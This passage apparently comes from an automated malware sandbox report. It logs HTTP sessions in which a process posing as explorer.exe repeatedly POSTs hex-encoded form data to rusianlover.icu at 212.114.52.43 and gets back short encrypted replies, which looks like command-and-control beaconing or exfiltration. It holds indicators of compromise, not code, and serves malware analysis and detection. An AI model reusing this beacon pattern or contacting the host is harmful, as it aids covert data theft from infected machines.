46 43 44 36 32 42 33 38 34 35 32 32 39 36 36 45 34 30 33 37 31 44 43 42 31 44 34 35 35 42 37 33 46 46 34 36 39 36 43 35 36 39 37 45 46 32 39 36 34 44 44 33 42 36 43 36 32 45 30 39 41 36 31 42 37 34 31 33 30 44 43 30 41 35 45 45 44 38 45 41 34 33 33 33 33 38 39 33 37 34 37 32 34 44 44 32 32 34 33 31 36 30 39 42 41 44 39 34 42 30 30 46 44 41 33 33 38 36 36 41 35 45 46 41 35 43 39 45 38 35 33 35 44 34 34 32 31 35 33 42 42 36 31 46 36 34 31 46 36 44 46 32 44 38 31 38 42 44 31 31 41 33 44 43 43 45 31 41 34 34 42 32 39 39 37 35 30 41 45 45 36 39 46 41 36 41 39 31 34 32 30 39 39 32 41 Data Ascii: myqc=0ea1deab7ce4bf29151e3c57d34a4fef309144580b0d5dc18b74a1&kukukuku=80444974&ocwkes=B3F895592AD401C1AD88EE4BE60F100FEC5F60408A116DE3E21DF769E4C7A63CA6D89D950B23097AED6484B498CEEFE1654727906BC47112D7FC5F10E3E7AEE9243B3B5C4BAE99974ADC1164320BC9A58E1DE7789A66FF22E2111E199FB2B3A0069215CC1C43C10F22FCC726C390C3D65AF6F72FD3B1573B95490D07C705DFE8B08DEFF2D1C919EB1D3D44CF8811E1B192235CAE7875DF3BA45405CCFF93238D087660A7FD40E8DC6A31D3912CDBF728FE0EDC787FA493F881F4993A1F1D54DB65366FCD62B384522966E40371DCB1D455B73FF4696C5697EF2964DD3B6C62E09A61B74130DC0A5EED8EA4333389374724DD22431609BAD94B00FDA33866A5EFA5C9E8535D442153BB61F641F6DF2D818BD11A3DCCE1A44B299750AEE69FA6A91420992A
Mar 10, 2021 11:43:31.722055912 CET	10162	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Wed, 10 Mar 2021 10:43:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 64 0d 0a a6 da 57 4f dc 70 ad 74 e9 2e 39 e0 46 b6 6b d0 98 98 26 9c 2f a2 db 4a ec dc 14 e4 4b 6c be ad d4 dd d9 e7 c3 3d 5a b6 83 5f c7 c6 4c 57 57 2d 31 70 99 84 af d3 5c b9 f0 9d 5c 98 5c b1 07 13 86 7b 73 e8 47 66 4d 07 63 40 de 62 43 87 cb 26 66 a7 58 6d 95 f2 c8 9a ff 42 a2 1d 9b f1 c0 76 ba 98 ed 44 d9 19 4a f2 17 b6 7a 6c 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6dWOpt.9Fk&/JKl=Z_LWW-1p\\\{sGfMc@bC&fXmBvDJzl0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.5	49756	212.114.52.43	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:43:34.476636887 CET	10164	OUT	POST /forum/logout.php?pid=438 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: rusianlover.icu Content-Length: 665 Cache-Control: no-cache Data Raw: 6b 75 65 6f 79 69 73 63 3d 45 38 31 41 32 38 46 39 43 45 31 38 46 34 31 32 37 42 39 43 39 41 45 34 39 42 36 44 32 37 35 45 33 35 35 36 41 39 32 45 35 41 38 35 43 42 41 42 43 33 26 69 71 79 67 6f 77 3d 37 36 37 38 32 32 34 32 26 6d 79 6b 77 3d 32 34 35 44 30 46 45 38 31 36 34 35 46 44 46 44 39 44 46 44 30 33 46 33 34 44 43 44 41 37 41 43 38 46 46 30 33 30 33 37 46 37 32 41 37 45 31 33 41 41 35 35 35 37 45 35 33 31 35 30 33 30 34 46 45 32 30 42 43 34 37 31 31 31 43 32 30 33 37 36 30 37 41 44 32 38 37 46 33 41 33 41 39 39 42 44 43 33 39 33 30 37 45 46 31 46 46 34 39 38 44 39 34 34 33 36 43 38 37 44 35 34 34 42 46 46 33 45 38 36 39 35 45 44 36 38 32 44 45 43 38 37 45 31 45 31 46 35 38 44 41 33 41 41 35 34 33 45 43 37 37 42 36 31 31 32 33 46 34 32 30 46 37 39 39 37 34 35 41 38 46 35 31 35 30 30 43 31 39 42 38 42 44 44 33 32 39 33 32 43 45 36 45 32 43 31 30 41 45 34 37 33 37 39 38 45 41 35 35 32 46 44 41 42 44 33 38 39 43 44 37 34 34 32 37 30 34 42 41 45 37 42 42 31 45 34 46 42 33 32 41 37 32 43 43 30 46 46 37 39 34 30 38 39 45 44 39 42 33 31 30 39 44 30 41 42 36 32 33 45 34 36 44 34 32 38 44 38 36 45 32 30 31 32 44 32 43 38 45 34 37 34 35 30 30 30 44 43 34 43 42 31 39 39 36 39 30 32 41 34 34 37 36 41 35 31 31 31 34 43 39 36 34 36 43 36 38 30 38 46 46 35 45 31 42 31 43 44 33 42 38 42 41 41 37 41 31 42 44 33 32 43 31 45 31 42 39 43 36 36 39 32 44 31 32 38 33 39 45 34 33 39 45 41 45 38 33 33 46 30 45 35 36 45 46 31 39 42 33 38 46 34 46 45 46 34 38 35 32 38 43 30 41 31 37 33 41 30 35 44 42 35 41 32 45 32 39 34 38 44 36 36 33 35 34 33 31 30 38 46 31 31 39 41 36 34 41 39 41 32 32 43 34 37 36 44 42 44 45 46 46 43 30 39 36 32 39 46 45 43 41 33 46 39 44 43 45 38 34 34 41 44 32 46 33 44 33 46 38 37 45 35 35 37 35 43 38 43 42 33 33 35 45 43 43 31 34 30 38 32 39 46 31 35 35 31 41 44 46 44 42 37 42 31 35 31 41 42 39 44 30 34 32 36 34 30 39 33 30 46 38 35 35 44 35 37 30 35 44 37 31 30 36 44 39 44 32 31 30 33 44 41 38 42 33 32 45 31 37 39 31 39 32 36 41 39 30 42 34 44 39 34 37 33 Data Ascii: kueoyisc=E81A28F9CE18F4127B9C9AE49B6D275E3556A92E5A85CBABC3&iqygow=76782242&mykw=245D0FE81645FDFD9DFD03F34DCDA7AC8FF03037F72A7E13AA5557E53150304FE20BC47111C2037607AD287F3A3A99BDC39307EF1FF498D94436C87D544BFF3E8695ED682DEC87E1E1F58DA3AA543EC77B61123F420F799745A8F51500C19B8BDD32932CE6E2C10AE473798EA552FDABD389CD7442704BAE7BB1E4FB32A72CC0FF794089ED9B3109D0AB623E46D428D86E2012D2C8E4745000DC4CB1996902A4476A51114C9646C6808FF5E1B1CD3B8BAA7A1BD32C1E1B9C6692D12839E439EAE833F0E56EF19B38F4FEF48528C0A173A05DB5A2E2948D663543108F119A64A9A22C476DBDEFFC09629FECA3F9DCE844AD2F3D3F87E5575C8CB335ECC140829F1551ADFDB7B151AB9D042640930F855D5705D7106D9D2103DA8B32E1791926A90B4D9473
Mar 10, 2021 11:43:34.552752972 CET	10165	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Wed, 10 Mar 2021 10:43:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 64 0d 0a 15 2d 76 15 1c 3b 5c 57 30 d0 a9 31 40 ac d2 3c c3 93 cf b6 85 e0 50 86 69 4f 44 92 14 ef ed 44 8e da 36 b8 cb dc 50 7d 53 13 e6 a3 1e 8b 89 c1 20 c9 af 94 e8 8b b1 22 cf 2b 0a 66 4e d0 cc 41 d4 1f 4a a2 6e 4f 0f 65 be a6 ba 8f f4 92 f6 e3 eb 02 1a 7a 2f 9b cd 68 5d 69 46 47 31 86 44 8e 72 4b 07 7c 24 08 bf 24 3a 7c fb 5f 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d-v;\W01@<PiODD6P}S "+fNAJnOez/h]iFG1DrK\|$$:\|_0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.5	49758	212.114.52.43	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:43:37.290297985 CET	10178	OUT	POST /forum/logout.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: rusianlover.icu Content-Length: 667 Cache-Control: no-cache Data Raw: 75 75 6f 6f 69 69 3d 35 38 44 34 43 39 33 36 39 34 32 38 37 46 34 30 46 32 46 30 46 37 44 46 35 39 41 43 30 41 33 41 41 41 41 46 36 45 38 41 35 33 44 45 37 32 34 41 41 31 42 37 26 73 71 69 67 3d 32 30 38 32 33 35 32 38 26 77 79 75 77 73 75 77 73 3d 36 61 61 37 37 33 64 37 39 62 38 66 61 31 64 34 62 38 64 66 31 35 63 34 63 31 38 63 32 66 30 38 63 36 31 65 36 38 32 39 66 37 33 35 62 63 65 63 34 39 38 34 32 63 36 36 35 66 37 35 36 65 64 31 32 64 32 31 38 35 65 61 65 31 64 32 36 62 66 34 34 62 39 32 61 32 32 38 63 33 37 34 31 65 66 39 36 32 31 66 37 65 63 66 65 61 34 31 64 35 35 32 39 32 32 31 63 37 37 32 37 34 61 61 30 31 34 39 38 36 65 39 39 30 61 36 36 30 39 32 61 32 36 34 31 61 65 65 62 65 39 38 31 39 37 34 39 35 38 31 38 32 30 33 36 33 66 30 66 39 38 37 66 36 62 61 64 38 66 39 37 36 38 39 39 61 36 38 62 35 63 30 34 34 31 39 31 61 36 36 31 35 63 34 62 36 35 39 63 37 33 61 36 39 66 33 35 34 38 36 38 30 30 35 62 37 36 31 38 39 31 39 38 66 64 61 34 33 32 34 36 63 62 63 63 65 39 39 39 37 62 34 38 32 66 64 35 37 37 30 34 31 31 66 38 64 62 33 61 34 33 63 61 66 38 37 66 32 63 30 63 32 31 64 33 66 61 66 66 38 65 65 32 31 62 62 65 33 62 38 39 34 32 36 64 37 31 61 64 30 62 31 35 63 32 61 39 37 31 33 37 39 35 63 38 37 31 34 65 39 34 63 33 36 32 39 38 64 66 36 66 66 33 64 34 35 64 32 34 32 35 35 38 31 39 34 35 61 30 38 33 66 37 62 38 36 34 37 39 65 65 30 33 31 38 61 35 66 30 63 38 30 39 61 30 36 62 38 31 63 66 37 65 32 63 66 37 62 61 38 39 39 64 64 65 63 31 35 34 61 38 37 33 62 66 62 64 62 63 39 64 37 66 63 36 36 63 31 34 32 36 63 64 33 39 33 31 36 62 34 39 38 39 37 33 64 32 34 37 33 32 35 63 31 33 36 65 39 31 36 39 38 31 63 39 31 63 39 30 33 65 37 61 39 62 64 30 36 31 32 62 33 36 30 36 35 36 32 31 65 65 33 36 31 39 39 65 33 34 39 65 61 61 34 35 31 65 37 63 39 66 39 65 34 62 62 39 35 38 62 30 39 36 30 61 36 61 61 35 32 39 32 36 30 63 32 31 64 65 64 66 32 66 61 61 35 31 39 38 39 64 35 30 65 38 65 37 35 66 33 38 36 63 36 62 30 39 65 30 65 38 31 36 32 38 61 37 32 33 33 64 64 30 65 Data Ascii: uuooii=58D4C93694287F40F2F0F7DF59AC0A3AAAAF6E8A53DE724AA1B7&sqig=20823528&wyuwsuws=6aa773d79b8fa1d4b8df15c4c18c2f08c61e6829f735bcec49842c665f756ed12d2185eae1d26bf44b92a228c3741ef9621f7ecfea41d5529221c77274aa014986e990a66092a2641aeebe9819749581820363f0f987f6bad8f976899a68b5c044191a6615c4b659c73a69f354868005b76189198fda43246cbcce9997b482fd5770411f8db3a43caf87f2c0c21d3faff8ee21bbe3b89426d71ad0b15c2a9713795c8714e94c36298df6ff3d45d2425581945a083f7b86479ee0318a5f0c809a06b81cf7e2cf7ba899ddec154a873bfbdbc9d7fc66c1426cd39316b498973d247325c136e916981c91c903e7a9bd0612b36065621ee36199e349eaa451e7c9f9e4bb958b0960a6aa529260c21dedf2faa51989d50e8e75f386c6b09e0e81628a7233dd0e
Mar 10, 2021 11:43:37.364464045 CET	10178	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Wed, 10 Mar 2021 10:43:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 64 0d 0a b9 79 de 49 86 05 1a 7e b7 6b 15 21 4d 21 e5 77 8b 1c cc 55 4e 8a ba 9f ed ff ec e4 87 c3 48 91 94 04 ac f6 b6 09 fe ac bc d6 49 9d 8f a6 e1 96 2b 0d 6e 70 02 5b d8 c1 2f 5c 0c 01 b7 f8 fe 34 3c 70 46 6e af e5 46 9b 3d e7 e4 64 94 6d 76 fc 77 56 f4 9d e7 19 61 61 08 98 67 18 af f0 a0 38 0b ad 60 b1 0f a7 24 08 43 2d 2c 06 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6dyI~k!M!wUNHI+np[/\4<pFnF=dmvwVaag8`$C-,0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.5	49759	212.114.52.43	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:43:40.332887888 CET	10180	OUT	POST /forum/logout.php?pid=925 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: rusianlover.icu Content-Length: 663 Cache-Control: no-cache Data Raw: 61 67 6d 6d 73 79 79 65 3d 41 31 43 32 45 35 46 34 39 33 38 32 42 32 45 33 36 32 35 37 35 32 39 41 30 34 36 39 39 43 36 36 33 35 45 33 42 41 46 41 44 41 41 32 33 45 38 41 26 79 63 67 65 69 6d 3d 38 38 35 33 34 31 30 36 26 63 6b 73 75 3d 63 35 38 62 66 38 31 66 61 36 33 36 38 35 66 37 62 61 38 38 64 34 34 35 33 34 31 34 65 62 30 35 34 31 36 39 65 66 61 66 65 36 63 30 62 31 37 32 65 61 62 63 35 33 65 37 39 65 64 62 63 62 34 31 61 38 64 30 34 30 30 62 32 62 31 38 32 38 39 34 32 63 61 31 34 32 64 66 61 38 65 34 36 61 62 30 63 30 32 37 30 63 38 63 63 34 36 62 66 30 31 33 63 63 35 39 36 39 37 64 62 32 30 62 39 65 64 35 31 30 33 33 35 33 38 61 36 38 66 37 66 34 31 38 62 34 38 31 33 32 36 35 64 33 30 32 63 33 32 34 33 33 63 31 63 35 62 33 35 66 36 39 39 34 36 33 39 36 38 38 66 62 37 36 66 64 34 63 31 38 63 39 38 36 63 61 31 37 61 32 30 38 39 32 34 31 34 66 35 37 37 31 63 61 64 62 38 37 63 37 34 39 35 64 37 65 36 32 65 34 62 32 34 64 63 65 37 33 34 64 62 61 33 33 30 30 36 62 65 34 61 64 30 39 30 64 32 38 35 35 38 62 63 63 32 65 35 31 32 38 31 32 35 32 35 64 63 66 34 38 33 31 37 39 32 61 33 62 62 32 63 62 33 39 35 34 62 35 35 37 38 64 32 61 35 38 30 66 31 65 39 63 62 39 33 38 38 64 31 33 39 32 38 33 63 33 33 33 66 39 36 30 62 33 39 37 31 65 64 35 39 33 30 38 61 66 64 61 62 34 30 39 32 30 31 61 34 62 30 39 34 38 33 64 31 64 31 31 30 38 65 61 30 33 36 35 34 65 62 65 30 35 39 65 37 32 62 32 37 30 38 33 30 39 61 62 32 32 38 35 64 33 38 39 39 38 64 66 36 63 31 38 66 37 39 32 36 35 34 31 65 39 64 61 61 66 65 30 33 31 34 35 30 30 66 64 62 32 36 65 62 36 32 34 62 65 30 31 30 32 65 32 64 61 38 66 37 37 62 31 33 39 37 30 32 36 30 36 36 32 64 61 62 36 37 30 63 34 35 31 33 39 62 36 31 65 34 30 65 39 66 64 34 30 30 36 62 38 38 34 39 39 39 61 63 64 39 36 66 35 66 38 61 31 65 63 39 65 65 38 33 33 33 65 37 62 35 31 66 32 33 61 30 63 65 32 31 35 38 35 63 32 65 66 62 37 37 64 65 66 34 38 65 30 31 33 64 61 65 37 35 33 37 37 63 32 33 62 62 63 38 37 31 35 32 64 66 38 64 30 35 38 30 38 Data Ascii: agmmsyye=A1C2E5F49382B2E36257529A04699C6635E3BAFADAA23E8A&ycgeim=88534106&cksu=c58bf81fa63685f7ba88d4453414eb054169efafe6c0b172eabc53e79edbcb41a8d0400b2b1828942ca142dfa8e46ab0c0270c8cc46bf013cc59697db20b9ed51033538a68f7f418b4813265d302c32433c1c5b35f6994639688fb76fd4c18c986ca17a20892414f5771cadb87c7495d7e62e4b24dce734dba33006be4ad090d28558bcc2e512812525dcf4831792a3bb2cb3954b5578d2a580f1e9cb9388d139283c333f960b3971ed59308afdab409201a4b09483d1d1108ea03654ebe059e72b2708309ab2285d38998df6c18f7926541e9daafe0314500fdb26eb624be0102e2da8f77b13970260662dab670c45139b61e40e9fd4006b884999acd96f5f8a1ec9ee8333e7b51f23a0ce21585c2efb77def48e013dae75377c23bbc87152df8d05808
Mar 10, 2021 11:43:40.402903080 CET	10180	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Wed, 10 Mar 2021 10:43:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 64 0d 0a b8 ba 73 46 52 80 79 06 99 cf be e1 2b b4 2e aa f5 24 75 80 ba 71 de 68 b1 45 51 1a 66 eb 6e b1 44 91 d7 42 00 84 2a f4 39 37 2f 19 79 56 5f 84 fe 78 35 1c 41 6d 73 87 0e bf 1c 45 b9 58 99 c3 ae f6 f6 88 d3 e4 8b df 7a 1c f4 0a 4e 81 09 cd 31 8e 8f 76 86 51 03 8d df 56 e2 e5 d8 23 f7 1d bd 1c 84 51 ba 4d 07 23 b5 27 0b ac 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6dsFRy+.$uqhEQfnDB*97/yV_x5AmsEXzN1vQV#QM#'0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.5	49760	212.114.52.43	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:43:43.684663057 CET	10182	OUT	POST /forum/logout.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: rusianlover.icu Content-Length: 648 Cache-Control: no-cache Data Raw: 74 73 72 6b 6a 69 68 61 7a 3d 31 36 35 34 36 33 36 31 26 76 77 78 73 74 3d 45 31 34 35 35 41 32 33 39 37 37 42 37 38 35 41 31 35 41 35 36 44 37 44 35 35 41 34 33 46 26 78 61 64 61 64 67 6a 3d 41 30 42 45 35 34 36 46 31 33 46 43 45 46 46 37 39 38 38 30 38 46 44 37 37 43 35 33 45 34 37 37 30 30 46 42 32 30 43 36 32 34 39 37 35 31 32 31 32 33 34 33 39 33 32 34 39 31 39 39 30 43 41 43 31 44 33 36 42 45 36 39 37 38 35 42 32 36 44 33 41 34 36 41 43 41 31 30 44 36 31 42 37 35 32 44 41 34 45 33 38 37 34 43 46 34 39 33 35 45 32 39 41 31 37 33 30 42 41 31 33 39 37 33 38 41 33 33 43 31 38 30 41 36 34 37 45 39 31 42 33 39 37 38 30 38 39 41 41 44 46 43 42 38 35 35 42 39 41 36 46 37 37 39 35 42 30 37 39 45 36 45 33 38 37 38 38 36 37 43 31 45 30 33 44 30 32 45 30 39 39 35 44 38 44 36 36 35 33 33 36 45 33 41 43 38 36 35 35 43 36 36 44 46 38 43 45 42 41 34 45 33 41 36 35 39 30 44 43 34 42 43 34 36 39 43 36 31 45 37 30 42 42 36 44 42 42 33 43 31 30 41 34 31 46 44 39 31 46 45 34 31 37 45 46 39 41 41 35 46 39 33 30 31 33 39 34 44 32 45 39 46 44 34 43 41 45 34 32 32 39 32 30 32 39 44 38 41 33 45 31 33 33 32 45 36 37 39 46 38 43 45 38 45 36 39 35 30 46 31 31 41 30 33 37 31 38 42 38 37 44 33 38 46 45 41 42 46 46 34 35 43 39 44 37 30 36 30 32 31 33 33 39 44 41 31 44 41 34 34 44 33 31 34 42 43 39 46 41 33 44 35 41 46 39 33 39 42 37 41 30 30 30 42 34 39 39 31 38 34 43 35 33 30 31 31 37 46 31 31 45 33 43 35 44 33 41 46 38 38 37 35 35 31 41 42 41 45 46 33 42 33 39 31 46 32 41 34 36 34 36 42 42 46 32 35 46 30 30 42 31 36 42 32 44 36 35 34 34 45 31 30 33 33 31 30 32 41 35 46 38 45 38 42 45 35 38 35 41 44 39 30 34 30 43 41 33 46 46 33 37 41 41 39 41 33 32 34 38 31 41 34 30 41 36 46 34 34 45 34 39 46 31 33 39 37 46 39 43 32 45 39 33 30 34 30 45 33 45 33 34 30 39 41 38 42 41 44 46 39 38 32 46 34 45 41 41 36 30 32 35 41 46 39 46 36 34 36 38 38 45 34 38 35 44 42 45 37 37 43 42 46 46 44 30 31 35 43 43 34 35 32 33 35 44 43 44 35 38 33 30 38 34 34 Data Ascii: tsrkjihaz=16546361&vwxst=E1455A23977B785A15A56D7D55A43F&xadadgj=A0BE546F13FCEFF798808FD77C53E47700FB20C6249751212343932491990CAC1D36BE69785B26D3A46ACA10D61B752DA4E3874CF4935E29A1730BA139738A33C180A647E91B3978089AADFCB855B9A6F7795B079E6E3878867C1E03D02E0995D8D665336E3AC8655C66DF8CEBA4E3A6590DC4BC469C61E70BB6DBB3C10A41FD91FE417EF9AA5F9301394D2E9FD4CAE42292029D8A3E1332E679F8CE8E6950F11A03718B87D38FEABFF45C9D706021339DA1DA44D314BC9FA3D5AF939B7A000B499184C530117F11E3C5D3AF887551ABAEF3B391F2A4646BBF25F00B16B2D6544E1033102A5F8E8BE585AD9040CA3FF37AA9A32481A40A6F44E49F1397F9C2E93040E3E3409A8BADF982F4EAA6025AF9F64688E485DBE77CBFFD015CC45235DCD5830844
Mar 10, 2021 11:43:43.760396957 CET	10182	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Wed, 10 Mar 2021 10:43:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 64 0d 0a 0a af b5 05 77 c9 fa 6b a3 43 38 53 78 ea f3 cb 6a 0c 45 93 99 5d 58 bf 46 91 13 02 31 76 13 a1 9d 1f 44 2a 93 34 ad 15 23 32 eb 0b 55 20 06 3c d7 a3 6b e3 4a 17 66 02 47 dd 28 fb d9 a2 8d bf 65 f7 98 66 ca 90 23 5f fb eb 0b 6b 84 68 61 df 10 44 58 b0 54 07 7a d8 9b 97 c1 0e 93 07 3d 7b 57 85 24 12 96 66 78 b6 b1 ed b6 75 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6dwkC8SxjE]XF1vD*4#2U <kJfG(ef#_khaDXTz={W$fxu0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.5	49761	212.114.52.43	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:43:46.563150883 CET	10184	OUT	POST /forum/logout.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: rusianlover.icu Content-Length: 644 Cache-Control: no-cache Data Raw: 7a 79 64 63 68 67 66 3d 36 65 64 38 64 39 33 32 37 37 36 30 35 30 32 61 31 31 61 31 33 31 35 61 32 63 26 78 75 78 75 78 3d 34 30 36 35 38 35 34 35 26 62 63 6a 6b 72 73 74 61 62 3d 33 46 36 37 44 37 43 43 38 35 36 36 39 35 42 39 41 32 42 44 31 32 30 44 34 44 31 37 46 38 39 32 30 42 36 30 36 43 34 38 43 32 34 34 46 33 30 36 34 43 31 35 35 38 39 36 39 31 41 42 36 34 31 38 45 37 32 32 41 35 30 33 41 37 34 45 35 30 43 35 44 34 30 43 44 36 34 36 46 33 32 32 36 32 35 34 38 37 32 46 36 33 35 34 32 30 37 41 31 30 42 42 35 46 33 33 44 33 39 45 44 36 42 46 35 43 41 45 33 39 42 32 39 31 35 41 34 37 34 36 38 33 42 36 44 38 42 39 32 35 30 35 39 30 33 30 37 37 42 43 42 31 39 38 44 45 32 46 39 44 41 38 45 32 43 44 42 35 39 31 44 30 33 38 31 44 30 38 36 38 33 41 44 33 41 42 33 46 46 30 30 39 37 31 33 46 35 46 31 36 44 42 44 45 44 37 33 39 46 39 43 30 30 38 30 31 45 39 30 44 34 42 34 33 42 39 43 41 45 42 45 44 43 32 42 31 41 35 33 42 31 34 34 46 42 44 43 43 37 31 33 46 32 30 38 37 34 41 33 46 35 36 42 33 30 43 37 35 34 30 39 39 44 39 36 39 32 46 45 39 35 44 32 37 37 31 30 41 39 35 38 42 41 42 42 37 36 34 44 32 39 45 37 43 46 43 44 32 39 37 35 33 32 33 36 44 31 42 35 30 45 34 44 31 42 34 38 33 45 35 46 30 45 36 36 37 35 37 34 32 30 32 44 31 32 34 38 46 32 35 46 43 34 30 38 39 33 37 33 41 32 37 35 30 30 32 41 32 44 35 42 37 44 32 36 31 38 45 43 43 45 34 44 36 35 41 46 31 38 42 30 41 44 31 39 43 32 35 46 39 45 33 30 31 32 43 46 46 42 30 30 44 31 38 34 38 30 36 46 41 41 34 34 41 30 32 37 44 46 45 44 44 32 38 31 33 35 31 46 35 41 31 38 43 33 37 38 39 39 35 32 34 36 31 35 43 31 36 37 43 32 43 44 31 43 33 33 33 43 38 39 31 39 46 30 35 30 43 36 44 45 38 44 34 41 46 34 30 35 41 33 41 45 35 45 42 41 44 31 39 31 35 43 44 35 45 45 44 30 42 35 41 46 46 44 36 41 34 33 36 38 37 36 32 35 30 38 46 33 31 45 34 46 43 30 43 46 36 42 38 41 30 38 32 38 33 34 36 44 44 39 46 34 33 34 43 30 36 41 33 39 32 33 37 44 35 43 35 45 31 46 45 31 34 Data Ascii: zydchgf=6ed8d9327760502a11a1315a2c&xuxux=40658545&bcjkrstab=3F67D7CC856695B9A2BD120D4D17F8920B606C48C244F3064C15589691AB6418E722A503A74E50C5D40CD646F3226254872F6354207A10BB5F33D39ED6BF5CAE39B2915A474683B6D8B92505903077BCB198DE2F9DA8E2CDB591D0381D08683AD3AB3FF009713F5F16DBDED739F9C00801E90D4B43B9CAEBEDC2B1A53B144FBDCC713F20874A3F56B30C754099D9692FE95D27710A958BABB764D29E7CFCD29753236D1B50E4D1B483E5F0E667574202D1248F25FC4089373A275002A2D5B7D2618ECCE4D65AF18B0AD19C25F9E3012CFFB00D184806FAA44A027DFEDD281351F5A18C37899524615C167C2CD1C333C8919F050C6DE8D4AF405A3AE5EBAD1915CD5EED0B5AFFD6A4368762508F31E4FC0CF6B8A0828346DD9F434C06A39237D5C5E1FE14
Mar 10, 2021 11:43:46.642538071 CET	10184	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Wed, 10 Mar 2021 10:43:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 64 0d 0a d4 0a 84 32 d2 78 15 76 87 21 ca ba 2c 1b fb 49 e4 0c 49 5a f3 a6 e9 21 54 97 99 d7 15 77 d4 c3 63 a7 ba f7 95 be 11 01 c0 cc 12 bd 6e 97 63 52 94 15 1c fe 16 f9 43 d6 e9 d9 7c 50 0d 1b e1 86 eb 76 55 7a 89 80 c5 d6 7b 94 15 b4 03 d4 47 3e 19 4f d4 d4 8b 36 06 e9 ab 1b cf eb 74 46 a0 ad a6 29 14 55 c9 af e7 58 4e 09 f7 a5 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d2xv!,IIZ!TwcncRC\|PvUz{G>O6tF)UXN0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.5	49762	212.114.52.43	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:43:49.404409885 CET	10186	OUT	POST /forum/logout.php?id=9557666 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: rusianlover.icu Content-Length: 672 Cache-Control: no-cache Data Raw: 66 71 62 67 72 3d 41 30 44 36 39 39 38 35 42 44 30 44 39 45 36 44 32 32 43 45 32 43 35 42 46 39 34 42 46 46 41 31 45 36 36 37 46 33 37 46 34 44 37 37 34 41 38 46 38 36 44 35 43 46 26 64 6d 76 79 68 71 7a 63 6c 3d 32 30 30 30 32 34 37 35 26 68 75 68 6f 62 6f 62 3d 62 62 65 37 65 39 66 65 35 38 39 31 30 35 33 30 32 62 34 63 31 39 38 33 33 37 64 37 65 30 64 31 37 63 34 38 39 31 62 34 37 64 61 30 32 38 37 61 30 35 35 38 30 39 35 65 30 38 64 62 65 36 32 36 65 66 31 35 33 37 39 62 39 35 36 30 62 38 32 37 34 30 65 38 39 33 66 31 66 35 66 63 61 39 65 30 64 34 65 64 30 63 62 33 33 31 61 61 62 61 38 37 66 31 63 65 66 35 34 34 64 66 64 32 61 31 62 35 39 61 36 39 63 62 66 61 35 38 39 32 31 33 61 31 31 63 36 31 39 38 36 65 39 34 31 34 32 31 35 33 63 63 39 39 66 63 61 35 64 62 34 34 61 66 34 38 61 65 66 37 65 30 65 30 36 65 34 34 34 37 61 33 33 31 61 37 62 32 30 33 61 38 62 32 33 61 66 35 37 61 35 62 38 38 34 31 62 32 64 63 62 38 37 31 64 37 37 64 65 61 33 61 65 39 34 34 65 66 66 65 39 64 33 32 39 31 32 32 35 63 32 34 39 32 38 35 61 61 33 31 66 62 35 39 66 39 63 39 36 33 36 37 36 37 39 36 33 37 64 65 34 62 39 66 66 30 63 62 34 37 35 66 33 62 35 64 37 36 65 37 61 35 66 31 34 35 64 36 31 30 64 61 61 63 61 35 38 63 37 32 31 36 32 32 33 61 34 64 35 35 64 36 61 36 36 32 38 38 63 34 35 31 61 61 39 37 39 62 37 65 